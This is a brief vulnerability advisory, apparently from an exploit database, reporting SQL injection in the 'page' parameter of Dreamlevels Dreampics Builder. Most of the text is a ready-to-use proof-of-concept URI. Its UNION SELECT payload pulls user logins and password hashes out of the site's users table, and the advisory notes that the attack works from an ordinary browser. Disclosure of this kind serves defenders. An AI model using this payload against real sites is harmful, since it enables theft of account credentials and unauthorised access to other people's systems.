Dreamlevels Dreampics Builder 'page' Parameter SQL Injection Vulnerability

Dreamlevels Dreampics Builder 'page' Parameter SQL Injection Vulnerability

An attacker can exploit this issue with a browser.

The following proof-of-concept URI is available:

http://www.example.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--